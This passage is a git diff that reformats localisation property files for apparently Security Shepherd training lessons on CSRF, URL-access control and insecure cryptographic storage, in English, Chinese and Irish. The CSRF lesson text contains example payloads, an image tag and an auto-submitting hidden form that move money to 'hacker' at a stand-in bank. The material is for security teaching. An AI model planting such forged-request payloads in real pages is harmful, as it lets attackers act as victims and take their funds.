-paragraph.info4=CSRF \u653B\u51FB\u53EF\u4EE5\u53D1\u751F\u5728 GET \u548C POST HTTP \u8BF7\u6C42\. \u8981\u4F7F\u53D7\u5BB3\u8005\u53EF\u4EE5\u65E0\u5F62\u5730\u63D0\u4EA4\u4E00\u4E2A GET \u8BF7\u6C42, \u8BE5\u8BF7\u6C42\u53EF\u4EE5\u5D4C\u5165\u5230\u7F51\u9875\u4E0A\u7684\u4E00\u4E2A\u56FE\u50CF\u6807\u7B7E, \u4F8B\u5982; <br /> &lt;img src=&quot;<a>http://www.secureBank.ie/sendMoney?giveMoneyTo=hacker&amp;giveAmount=1000</a>&quot;/&gt;
-paragraph.info5=\u8981\u5F3A\u8FEB\u53D7\u5BB3\u8005\u53D1\u9001\u4E00\u4E2A POST \u8BF7,\u6C42\u5E76\u975E\u8F7B\u800C\u6613\u4E3E.\u6700\u7B80\u5355\u7684\u65B9\u6CD5\u662F\u4F7F\u7528 JavaScript \u521B\u5EFA\u4E00\u4E2A\u81EA\u52A8\u63D0\u4EA4\u7684\u8868\u683C,\u5728\u6B64\u63D0\u4F9B\u4E9B\u793A\u4F8B\u5982\u4E0B;<br/> &lt;form name=&quot;csrfForm&quot; action=&quot;<a>http://www.secureBank.ie/sendMoney</a>&quot; method=&quot;<a>POST</a>&quot;&gt;<br /> &lt;input type=&quot;hidden&quot; name=&quot;<a>giveMoneyTo</a>&quot; value=&quot;hacker&quot; /&gt;<br /> &lt;input type=&quot;hidden&quot; name=&quot;<a>giveAmount</a>&quot; value=&quot;1000&quot; /&gt;<br /> &lt;input type=&quot;submit&quot;/&gt;<br /> &lt;/form&gt;<br /> &lt;script&gt;<br /> document.csrfForm.submit();<br /> &lt;/script&gt;
-paragraph.info6=\u5BF9\u4E8E\u7528\u6237\u800C\u8A00,\u5B8C\u6210\u8BE5\u8BFE\u7A0B\u7684\u6807\u5FD7\u662F\u4F7F\u7531\u7BA1\u7406\u5458\u4F7F\u7528\u7684\u529F\u80FD\u88AB\u521D\u59CB\u5316\u4E3A\u53D1\u9001\u4EE5\u4E0B GET request\u5230\u8FD9\u53F0\u670D\u52A1\u5668.\u5176\u4E2D'exampleId'\u662F\u4E00\u4E2A\u6709\u6548\u7684 userId.
-paragraph.info7=\u8981\u5B8C\u6210\u8BE5\u8BFE\u7A0B,\u9700\u53D1\u9001\u4E00\u6761\u542B\u56FE\u7247 URL \u7684\u4FE1\u606F\u7ED9\u7BA1\u7406\u5458,\u5176\u5C06\u663E\u793A\u5728\u4E00\u4E2A\u5D4C\u5165<a><img></a>\u7684\u6807\u7B7E\u4E2D,\u5B83\u5C06\u5F3A\u8FEB\u4ED6\u4EEC\u63D0\u4EA4\u4E0A\u8FF0\u8BF7\u6C42(Request),\u4EE3\u66FF exampleId \u7684\u4E34\u65F6 userId \u662F
-challenge.title=\u8054\u7CFB\u7BA1\u7406\u5458
-challenge.description=\u8BF7\u8F93\u5165\u4F60\u60F3\u53D1\u9001\u7ED9 Security Shepherd 24 \u5C0F\u65F6\u670D\u52A1\u7684\u7BA1\u7406\u5458\u4E2D\u7684\u4E00\u4E2A\u7684<a>\u56FE\u50CFURL</a>
-button.hideIntro=\u9690\u85CF CSRF \u4ECB\u7ECD
-button.showIntro=\u663E\u793A CSRF \u4ECB\u7ECD
-button.sendMessage=\u53D1\u9001\u4FE1\u606F
-generic.loading=\u8BF7\u7A0D\u4FAF
-generic.error=\u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
+title.question.csrf = \u4EC0\u4E48\u662F\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020?
+
+paragraph.info1 = \u4E00\u4E2A\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020\u653B\u51FB\u8FEB\u4F7F\u767B\u5F55\u7528\u6237\u7684\u6D4F\u89C8\u5668\u5C06\u4F2A\u9020\u7684HTTP\u8BF7\u6C42,\u5305\u62EC\u8BE5\u7528\u6237\u7684\u4F1A\u8BDDcookie\u548C\u5176\u4ED6\u8BA4\u8BC1\u4FE1\u606F,\u53D1\u9001\u5230\u4E00\u4E2A\u5B58\u5728\u6F0F\u6D1E\u7684web\u5E94\u7528\u7A0B\u5E8F.\u8FD9\u5C31\u5141\u8BB8\u4E86\u653B\u51FB\u8005\u8FEB\u4F7F\u7528\u6237\u6D4F\u89C8\u5668\u5411\u5B58\u5728\u6F0F\u6D1E\u7684\u5E94\u7528\u7A0B\u5E8F\u53D1\u9001\u6C42,\u800C\u8FD9\u4E9B\u8BF7\u6C42\u4F1A\u88AB\u5E94\u7528\u7A0B\u5E8F\u8BA4\u4E3A\u662F\u7528\u6237\u7684\u5408\u6CD5\u8BF7\u6C42.CSRF\u653B\u51FB\u53EF\u80FD\u53D1\u751F\u5728\u5F53\u5E94\u7528\u7A0B\u5E8F\u4E0D\u786E\u5B9A\u8BE5\u7528\u6237\u5B9E\u9645\u4E0A\u662F\u4E0D\u662F\u4E0E\u5176\u8FDB\u884C\u4EA4\u4E92.CSRF\u653B\u51FB\u7684\u4E25\u91CD\u7A0B\u5EA6\u968F\u53D7\u5BB3\u8005\u88AB\u6B3A\u9A97\u4EA4\u4E92\u7684\u5E94\u7528\u7A0B\u5E8F\u7684\u529F\u80FD\u51B3\u5B9A. \u5982\u679C\u653B\u51FB\u7684\u76EE\u7684\u662F\u7BA1\u7406\u5458,\u90A3\u4E48\u4E25\u91CD\u7A0B\u5EA6\u5C06\u5927\u5927\u9AD8\u51FA\u653B\u51FB\u76EE\u7684\u65E8\u5728\u666E\u901A\u7528\u6237.
+paragraph.info2 = \u4E3A\u4E86\u9632\u6B62 CSRF \u653B\u51FB,\u6BCF\u4E00\u4E2A\u7528\u6237\u8BF7\u6C42\u90FD\u5FC5\u987B\u5305\u542B\u4E00\u4E2A<a>\u4E34\u65F6</a>Token(\u4E0D\u53EF\u9884\u77E5\u7684\u6570,\u5373\u968F\u673A\u6570).\u8981\u5728\u5E94\u7528\u7A0B\u5E8F\u4E2D\u627E\u5230 CSRF \u6F0F\u6D1E, Token \u5C31\u662F\u9700\u8981\u6211\u4EEC\u6D4B\u8BD5\u7684\u4E00\u4E2A\u5143\u7D20.\u5982\u679C\u4E00\u4E2A\u8BF7\u6C42\u6CA1\u6709\u5305\u542B\u968F\u5373\u6570,\u90A3\u4E48\u662F\u5F88\u6709\u53EF\u80FD\u88AB CSRF \u653B\u51FB\u7684. \u5982\u679C\u4E00\u4E2A\u8BF7\u6C42\u4E2D\u5305\u542B\u4E86\u4E00\u4E2A\u968F\u5373\u6570,\u90A3\u4E48\u5C31\u9700\u8981\u66F4\u591A\u7684\u6B65\u9AA4\u6765\u5BF9 CSRF \u8FDB\u884C\u6D4B\u8BD5.\u5C3D\u7BA1\u968F\u673A\u6570\u662F\u5728\u8BF7\u6C42\u5F53\u4E2D,\u5B83\u6709\u53EF\u80FD\u4E0D\u88AB\u9A8C\u8BC1\u6216\u53EF\u80FD\u5C31\u662F\u4E00\u4E2A\u7A7A\u503C. \u90A3\u4E48,\u5E94\u7528\u7A0B\u5E8F\u7684\u968F\u673A\u6570\u7BA1\u7406\u53EF\u80FD\u5141\u8BB8\u653B\u51FB\u8005\u4F7F\u7528\u4ED6\u4EEC\u672C\u8EAB\u6709\u6548\u7684\u968F\u673A\u6570\u4F7F\u7528\u5728\u5176\u4ED6\u7528\u6237\u7684\u8BF7\u6C42\u4E2D.
+paragraph.info3 = HTTP \u8BF7\u6C42\u53EF\u4EE5\u901A\u8FC7 JavaScript \u53D1\u9001. \u4EE5\u8FD9\u79CD\u65B9\u5F0F\u53D1\u9001\u7684\u8BF7\u6C42\u5305\u542B\u4E00\u4E2A HTTP \u6807\u5934 "X-Requested-With". \u5982\u679C\u8BE5\u6807\u5934\u88AB\u67E5\u9A8C\u5728\u4F20\u5165\u7684\u8BF7\u6C42\u4E2D, \u8FD9\u53EF\u4EE5\u4F5C\u4E3A\u4E00\u4E2A\u5BF9 CSRF \u6CA1\u6709\u968F\u673A\u503C\u7684\u4FDD\u62A4. \u5B83\u4E0D\u80FD\u4ECE\u8FDC\u7A0B\u57DF\u590D\u5236, \u7531\u4E8E <a>Same Origin Policy</a>\u53EF\u4EE5\u9632\u6B62\u653B\u51FB\u8005\u8FDB\u884C\u8FDC\u7A0B\u653B\u51FB. \u4F46\u662F\u4E0D\u5EFA\u8BAE\u4EE5\u6B64\u4F5C\u4E3A\u552F\u4E00\u7684 CSRF \u4FDD\u62A4\u6A21\u5F0F, \u56E0\u4E3A\u5E38\u88AB\u53D1\u73B0\u7684\u6D4F\u89C8\u5668\u95EE\u9898\u662F\u5141\u8BB8\u653B\u51FB\u8005\u901A\u8FC7\u4E00\u4E2A\u6D4F\u89C8\u5668\u53D1\u9001\u8DE8\u57DF\u8BF7\u6C42.
+paragraph.info4 = CSRF \u653B\u51FB\u53EF\u4EE5\u53D1\u751F\u5728 GET \u548C POST HTTP \u8BF7\u6C42\. \u8981\u4F7F\u53D7\u5BB3\u8005\u53EF\u4EE5\u65E0\u5F62\u5730\u63D0\u4EA4\u4E00\u4E2A GET \u8BF7\u6C42, \u8BE5\u8BF7\u6C42\u53EF\u4EE5\u5D4C\u5165\u5230\u7F51\u9875\u4E0A\u7684\u4E00\u4E2A\u56FE\u50CF\u6807\u7B7E, \u4F8B\u5982; <br /> &lt;img src=&quot;<a>http://www.secureBank.ie/sendMoney?giveMoneyTo=hacker&amp;giveAmount=1000</a>&quot;/&gt;
+paragraph.info5 = \u8981\u5F3A\u8FEB\u53D7\u5BB3\u8005\u53D1\u9001\u4E00\u4E2A POST \u8BF7,\u6C42\u5E76\u975E\u8F7B\u800C\u6613\u4E3E.\u6700\u7B80\u5355\u7684\u65B9\u6CD5\u662F\u4F7F\u7528 JavaScript \u521B\u5EFA\u4E00\u4E2A\u81EA\u52A8\u63D0\u4EA4\u7684\u8868\u683C,\u5728\u6B64\u63D0\u4F9B\u4E9B\u793A\u4F8B\u5982\u4E0B;<br/> &lt;form name=&quot;csrfForm&quot; action=&quot;<a>http://www.secureBank.ie/sendMoney</a>&quot; method=&quot;<a>POST</a>&quot;&gt;<br /> &lt;input type=&quot;hidden&quot; name=&quot;<a>giveMoneyTo</a>&quot; value=&quot;hacker&quot; /&gt;<br /> &lt;input type=&quot;hidden&quot; name=&quot;<a>giveAmount</a>&quot; value=&quot;1000&quot; /&gt;<br /> &lt;input type=&quot;submit&quot;/&gt;<br /> &lt;/form&gt;<br /> &lt;script&gt;<br /> document.csrfForm.submit();<br /> &lt;/script&gt;
+paragraph.info6 = \u5BF9\u4E8E\u7528\u6237\u800C\u8A00,\u5B8C\u6210\u8BE5\u8BFE\u7A0B\u7684\u6807\u5FD7\u662F\u4F7F\u7531\u7BA1\u7406\u5458\u4F7F\u7528\u7684\u529F\u80FD\u88AB\u521D\u59CB\u5316\u4E3A\u53D1\u9001\u4EE5\u4E0B GET request\u5230\u8FD9\u53F0\u670D\u52A1\u5668.\u5176\u4E2D'exampleId'\u662F\u4E00\u4E2A\u6709\u6548\u7684 userId.
+paragraph.info7 = \u8981\u5B8C\u6210\u8BE5\u8BFE\u7A0B,\u9700\u53D1\u9001\u4E00\u6761\u542B\u56FE\u7247 URL \u7684\u4FE1\u606F\u7ED9\u7BA1\u7406\u5458,\u5176\u5C06\u663E\u793A\u5728\u4E00\u4E2A\u5D4C\u5165<a><img></a>\u7684\u6807\u7B7E\u4E2D,\u5B83\u5C06\u5F3A\u8FEB\u4ED6\u4EEC\u63D0\u4EA4\u4E0A\u8FF0\u8BF7\u6C42(Request),\u4EE3\u66FF exampleId \u7684\u4E34\u65F6 userId \u662F
+challenge.title = \u8054\u7CFB\u7BA1\u7406\u5458
+challenge.description = \u8BF7\u8F93\u5165\u4F60\u60F3\u53D1\u9001\u7ED9 Security Shepherd 24 \u5C0F\u65F6\u670D\u52A1\u7684\u7BA1\u7406\u5458\u4E2D\u7684\u4E00\u4E2A\u7684<a>\u56FE\u50CFURL</a>
+			
+button.hideIntro = \u9690\u85CF CSRF \u4ECB\u7ECD
+button.showIntro = \u663E\u793A CSRF \u4ECB\u7ECD
+button.sendMessage = \u53D1\u9001\u4FE1\u606F
+
+generic.loading = \u8BF7\u7A0D\u4FAF
+generic.error = \u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
 
diff --git a/src/main/resources/i18n/lessons/failure_to_restrict_url_access/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3.properties b/src/main/resources/i18n/lessons/failure_to_restrict_url_access/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3.properties
index 1fb0214af..7d743580a 100644
--- a/src/main/resources/i18n/lessons/failure_to_restrict_url_access/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3.properties
+++ b/src/main/resources/i18n/lessons/failure_to_restrict_url_access/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3.properties
@@ -1,9 +1,12 @@
-title.question.fail_restrict_url_acc=What is a Failure to Restrict URL Access?
-paragraph.info1=An application that <a>fails to restrict URL access</a> is an application that is not protecting its "protected" pages sufficiently. This occurs when an application hides functionality from basic users. In an application that fails to restrict URL access, administration links are only put onto the page if the user is an administrator. If users discover a page's address, they can still access it via URL access.
-paragraph.info2=Preventing unauthorized URL access requires selecting an approach for requiring proper authentication and proper authorization for each page. The easier the authentication is to include in a page the more likely that all pages will be covered by the policy.
-challenge.description=The result key to this lesson is stored in a <a>web page</a> only administrators know about.
-challenge.adminLink=Administrator Result Page
-challenge.adminComment=This is only displayed for Administrators
-challenge.resultKey=Result Key
-button.hideLesson=Hide Lesson Introduction
-button.showLesson=Show Lesson Introduction
\ No newline at end of file
+title.question.fail_restrict_url_acc = What is a Failure to Restrict URL Access?
+
+paragraph.info1 = An application that <a>fails to restrict URL access</a> is an application that is not protecting its "protected" pages sufficiently. This occurs when an application hides functionality from basic users. In an application that fails to restrict URL access, administration links are only put onto the page if the user is an administrator. If users discover a page's address, they can still access it via URL access.
+paragraph.info2 = Preventing unauthorized URL access requires selecting an approach for requiring proper authentication and proper authorization for each page. The easier the authentication is to include in a page the more likely that all pages will be covered by the policy.
+
+challenge.description = The result key to this lesson is stored in a <a>web page</a> only administrators know about.
+challenge.adminLink = Administrator Result Page
+challenge.adminComment = This is only displayed for Administrators
+challenge.resultKey = Result Key
+
+button.hideLesson = Hide Lesson Introduction
+button.showLesson = Show Lesson Introduction
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/failure_to_restrict_url_access/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3_zh.properties b/src/main/resources/i18n/lessons/failure_to_restrict_url_access/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3_zh.properties
index 4849fc465..3c445b88d 100644
--- a/src/main/resources/i18n/lessons/failure_to_restrict_url_access/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3_zh.properties
+++ b/src/main/resources/i18n/lessons/failure_to_restrict_url_access/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3_zh.properties
@@ -1,9 +1,13 @@
-title.question.fail_restrict_url_acc=\u4EC0\u4E48\u662F\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE?
-paragraph.info1=\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE\u7684\u5E94\u7528\u7A0B\u5E8F,\u662F\u6307\u8BE5\u5E94\u7528\u7A0B\u5E8F\u672A\u80FD\u5145\u5206\u4FDD\u62A4'\u9700\u8981\u4FDD\u62A4\u7684'\u9875\u9762.\u8FD9\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u5411\u666E\u901A\u7528\u6237\u9690\u85CF\u90E8\u5206\u529F\u80FD.\u5728\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE\u7684\u5E94\u7528\u7A0B\u5E8F\u4E2D,\u7BA1\u7406\u94FE\u63A5\u4EC5\u663E\u793A\u5728\u8EAB\u4EFD\u4E3A\u7BA1\u7406\u5458\u7684\u7528\u6237\u7684\u9875\u9762.\u5982\u679C\u7528\u6237\u53D1\u73B0\u4E00\u4E2A\u9875\u9762\u7684\u5730\u5740,\u4ED6\u4EEC\u4ECD\u7136\u53EF\u4EE5\u901A\u8FC7URL\u8FDB\u884C\u8BBF\u95EE.
-paragraph.info2=\u9632\u6B62\u672A\u6388\u6743\u7684URL\u8BBF\u95EE\u9700\u8981\u9009\u62E9\u4E00\u79CD\u65B9\u6CD5, \u8BE5\u65B9\u6CD5\u662F\u6BCF\u4E00\u4E2A\u9875\u9762\u90FD\u9700\u8981\u9002\u5F53\u7684\u8EAB\u4EFD\u9A8C\u8BC1\u548C\u9002\u5F53\u7684\u6388\u6743\u624D\u80FD\u8FDB\u5165. \u5728\u4E00\u4E2A\u9875\u9762\u4E2D\u5305\u542B\u7684\u8BA4\u8BC1\u8D8A\u7B80\u5355,\u8D8A\u53EF\u80FD\u6240\u6709\u9875\u9762\u88AB\u653F\u7B56\u6240\u8986\u76D6.
-challenge.description=\u8BE5\u8BFE\u7684\u7ED3\u679C\u5BC6\u5319\u88AB\u50A8\u5B58\u5728\u4E00\u4E2A\u53EA\u6709\u7BA1\u7406\u5458\u77E5\u9053\u7684<a>\u9875\u9762</a>.
-challenge.adminLink=\u7BA1\u7406\u5458\u7ED3\u679C\u9875\u9762
-challenge.adminComment=\u8FD9\u4EC5\u663E\u793A\u7ED9\u7BA1\u7406\u5458
-challenge.resultKey=\u7ED3\u679C\u5BC6\u5319
-button.hideLesson=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showLesson=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+title.question.fail_restrict_url_acc = \u4EC0\u4E48\u662F\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE?
+
+paragraph.info1 = \u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE\u7684\u5E94\u7528\u7A0B\u5E8F,\u662F\u6307\u8BE5\u5E94\u7528\u7A0B\u5E8F\u672A\u80FD\u5145\u5206\u4FDD\u62A4'\u9700\u8981\u4FDD\u62A4\u7684'\u9875\u9762.\u8FD9\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u5411\u666E\u901A\u7528\u6237\u9690\u85CF\u90E8\u5206\u529F\u80FD.\u5728\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE\u7684\u5E94\u7528\u7A0B\u5E8F\u4E2D,\u7BA1\u7406\u94FE\u63A5\u4EC5\u663E\u793A\u5728\u8EAB\u4EFD\u4E3A\u7BA1\u7406\u5458\u7684\u7528\u6237\u7684\u9875\u9762.\u5982\u679C\u7528\u6237\u53D1\u73B0\u4E00\u4E2A\u9875\u9762\u7684\u5730\u5740,\u4ED6\u4EEC\u4ECD\u7136\u53EF\u4EE5\u901A\u8FC7URL\u8FDB\u884C\u8BBF\u95EE.
+paragraph.info2 = \u9632\u6B62\u672A\u6388\u6743\u7684URL\u8BBF\u95EE\u9700\u8981\u9009\u62E9\u4E00\u79CD\u65B9\u6CD5, \u8BE5\u65B9\u6CD5\u662F\u6BCF\u4E00\u4E2A\u9875\u9762\u90FD\u9700\u8981\u9002\u5F53\u7684\u8EAB\u4EFD\u9A8C\u8BC1\u548C\u9002\u5F53\u7684\u6388\u6743\u624D\u80FD\u8FDB\u5165. \u5728\u4E00\u4E2A\u9875\u9762\u4E2D\u5305\u542B\u7684\u8BA4\u8BC1\u8D8A\u7B80\u5355,\u8D8A\u53EF\u80FD\u6240\u6709\u9875\u9762\u88AB\u653F\u7B56\u6240\u8986\u76D6.
+
+
+challenge.description = \u8BE5\u8BFE\u7684\u7ED3\u679C\u5BC6\u5319\u88AB\u50A8\u5B58\u5728\u4E00\u4E2A\u53EA\u6709\u7BA1\u7406\u5458\u77E5\u9053\u7684<a>\u9875\u9762</a>.
+challenge.adminLink = \u7BA1\u7406\u5458\u7ED3\u679C\u9875\u9762
+challenge.adminComment = \u8FD9\u4EC5\u663E\u793A\u7ED9\u7BA1\u7406\u5458
+challenge.resultKey = \u7ED3\u679C\u5BC6\u5319
+
+button.hideLesson = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showLesson = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
diff --git a/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2.properties b/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2.properties
index f7b5fe55a..a15f3f8ee 100644
--- a/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2.properties
+++ b/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2.properties
@@ -1,6 +1,9 @@
-title.question.insecure_crypto=What is Insecure Cryptographic Storage?
-paragraph.info1=The most common flaw in this area is simply <a>not encrypting data</a> that deserves encryption. When encryption is employed, unsafe key generation and storage, not rotating keys and weak algorithm usage is common. Use of weak or unsalted hashes to protect passwords is also common. These mistakes can compromise all of the data that should have been encrypted. Typically this information includes sensitive data such as health records, credentials, personal data, credit cards, etc.
-paragraph.info2=Imagine an application that <a>encrypts</a> credit cards in a database to prevent exposure to end users. However, the database is set to automatically decrypt queries against the credit card columns, allowing an SQL injection flaw to retrieve all the credit cards in clear text. The system should have been configured to allow only back end applications to decrypt them, not the front end web application.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-challenge.description=The decision has been made that the result key to this lesson should not be publicly available. To achieve this, the development team have decided to encode the result key with <a>base64</a>... recover it to complete the lesson.
\ No newline at end of file
+title.question.insecure_crypto = What is Insecure Cryptographic Storage?
+
+paragraph.info1 = The most common flaw in this area is simply <a>not encrypting data</a> that deserves encryption. When encryption is employed, unsafe key generation and storage, not rotating keys and weak algorithm usage is common. Use of weak or unsalted hashes to protect passwords is also common. These mistakes can compromise all of the data that should have been encrypted. Typically this information includes sensitive data such as health records, credentials, personal data, credit cards, etc.
+paragraph.info2 = Imagine an application that <a>encrypts</a> credit cards in a database to prevent exposure to end users. However, the database is set to automatically decrypt queries against the credit card columns, allowing an SQL injection flaw to retrieve all the credit cards in clear text. The system should have been configured to allow only back end applications to decrypt them, not the front end web application.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+
+challenge.description = The decision has been made that the result key to this lesson should not be publicly available. To achieve this, the development team have decided to encode the result key with <a>base64</a>... recover it to complete the lesson.
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2_ga.properties b/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2_ga.properties
index 077738b7a..024840e5a 100644
--- a/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2_ga.properties
+++ b/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2_ga.properties
@@ -1 +1 @@
-title.question.insecure_crypto=Cád é Insecure Cryptographic Storage?
\ No newline at end of file
+title.question.insecure_crypto = Cád é Insecure Cryptographic Storage?
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2_zh.properties b/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2_zh.properties
index 87e1d0129..f453fa9f8 100644
--- a/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2_zh.properties
+++ b/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2_zh.properties
@@ -1,6 +1,9 @@
-title.question.insecure_crypto=\u4EC0\u4E48\u662F\u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8?
-paragraph.info1=\u5728\u8FD9\u65B9\u9762\u6700\u5E38\u89C1\u7684\u7F3A\u9677\u662F\u7B80\u5355\u7684\u6CA1\u6709\u52A0\u5BC6\u90A3\u4E9B\u9700\u8981\u52A0\u5BC6\u7684\u6570\u636E.\u800C\u5728\u4F7F\u7528\u52A0\u5BC6\u7684\u60C5\u51B5\u4E0B,\u4E0D\u5B89\u5168\u5BC6\u5319\u7684\u751F\u6210\u548C\u50A8\u5B58,\u4E0D\u8F6C\u52A8\u94A5\u5319\u548C\u5F31\u7684\u7B97\u6CD5\u7684\u4F7F\u7528\u90FD\u662F\u6BD4\u8F83\u5E38\u89C1\u7684.\u4F7F\u7528\u5F31\u7684\u52A0\u5BC6\u6216\u672A\u52A0\u5BC6\u65B9\u5F0F\u6765\u4FDD\u62A4\u5BC6\u7801\u4E5F\u5F88\u666E\u904D.\u800C\u8FD9\u4E9B\u9519\u8BEF\u53EF\u4EE5\u6CC4\u9732\u6240\u6709\u5E94\u5DF2\u52A0\u5BC6\u7684\u6570\u636E.\u901A\u5E38\u6765\u8BF4,\u8FD9\u4E9B\u4FE1\u606F\u5305\u62EC\u654F\u611F\u6570\u636E,\u6BD4\u5982\u5065\u5EB7\u8BB0\u5F55,\u4E2A\u4EBA\u51ED\u8BC1,\u4E2A\u4EBA\u4FE1\u606F,\u4EE5\u53CA\u4FE1\u7528\u5361\u7B49.
-paragraph.info2=\u8BD5\u60F3\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F,\u4E3A\u9632\u6B62\u6570\u636E\u88AB\u66B4\u9732\u5728\u7EC8\u7AEF,\u5C06\u4FE1\u7528\u5361\u4FE1\u606F<a>\u52A0\u5BC6</a>.\u7136\u800C,\u6570\u636E\u5E93\u88AB\u8BBE\u7F6E\u6210\u81EA\u52A8\u89E3\u5BC6\u67E5\u8BE2\u4FE1\u7528\u5361\u5728\u6570\u636E\u5E93\u4E2D\u7684\u5217,\u4E5F\u5C31\u662F\u5141\u8BB8\u4E00\u4E2ASQL\u6CE8\u5165\u6F0F\u6D1E\u4EE5\u660E\u6587\u5F62\u5F0F\u6765\u68C0\u7D22\u6240\u6709\u7684\u4FE1\u7528\u5361.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-challenge.description=\u901A\u8FC7\u8BE5\u8BFE\u7A0B\u7684\u7ED3\u679C\u5BC6\u5319\u88AB\u8BA4\u4E3A\u662F\u4E0D\u5E94\u8BE5\u5411\u5927\u4F17\u516C\u5F00\u7684,\u5F00\u53D1\u4EBA\u5458\u5DF2\u7ECF\u5C06\u7ED3\u679C\u5BC6\u5319\u4EE5<a>base64</a>\u65B9\u5F0F\u52A0\u5BC6\u4E86,\u6062\u590D\u5BC6\u5319\u6765\u5B8C\u6210\u8BE5\u8BFE.
+title.question.insecure_crypto = \u4EC0\u4E48\u662F\u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8?
+
+paragraph.info1 = \u5728\u8FD9\u65B9\u9762\u6700\u5E38\u89C1\u7684\u7F3A\u9677\u662F\u7B80\u5355\u7684\u6CA1\u6709\u52A0\u5BC6\u90A3\u4E9B\u9700\u8981\u52A0\u5BC6\u7684\u6570\u636E.\u800C\u5728\u4F7F\u7528\u52A0\u5BC6\u7684\u60C5\u51B5\u4E0B,\u4E0D\u5B89\u5168\u5BC6\u5319\u7684\u751F\u6210\u548C\u50A8\u5B58,\u4E0D\u8F6C\u52A8\u94A5\u5319\u548C\u5F31\u7684\u7B97\u6CD5\u7684\u4F7F\u7528\u90FD\u662F\u6BD4\u8F83\u5E38\u89C1\u7684.\u4F7F\u7528\u5F31\u7684\u52A0\u5BC6\u6216\u672A\u52A0\u5BC6\u65B9\u5F0F\u6765\u4FDD\u62A4\u5BC6\u7801\u4E5F\u5F88\u666E\u904D.\u800C\u8FD9\u4E9B\u9519\u8BEF\u53EF\u4EE5\u6CC4\u9732\u6240\u6709\u5E94\u5DF2\u52A0\u5BC6\u7684\u6570\u636E.\u901A\u5E38\u6765\u8BF4,\u8FD9\u4E9B\u4FE1\u606F\u5305\u62EC\u654F\u611F\u6570\u636E,\u6BD4\u5982\u5065\u5EB7\u8BB0\u5F55,\u4E2A\u4EBA\u51ED\u8BC1,\u4E2A\u4EBA\u4FE1\u606F,\u4EE5\u53CA\u4FE1\u7528\u5361\u7B49.
+paragraph.info2 = \u8BD5\u60F3\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F,\u4E3A\u9632\u6B62\u6570\u636E\u88AB\u66B4\u9732\u5728\u7EC8\u7AEF,\u5C06\u4FE1\u7528\u5361\u4FE1\u606F<a>\u52A0\u5BC6</a>.\u7136\u800C,\u6570\u636E\u5E93\u88AB\u8BBE\u7F6E\u6210\u81EA\u52A8\u89E3\u5BC6\u67E5\u8BE2\u4FE1\u7528\u5361\u5728\u6570\u636E\u5E93\u4E2D\u7684\u5217,\u4E5F\u5C31\u662F\u5141\u8BB8\u4E00\u4E2ASQL\u6CE8\u5165\u6F0F\u6D1E\u4EE5\u660E\u6587\u5F62\u5F0F\u6765\u68C0\u7D22\u6240\u6709\u7684\u4FE1\u7528\u5361.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
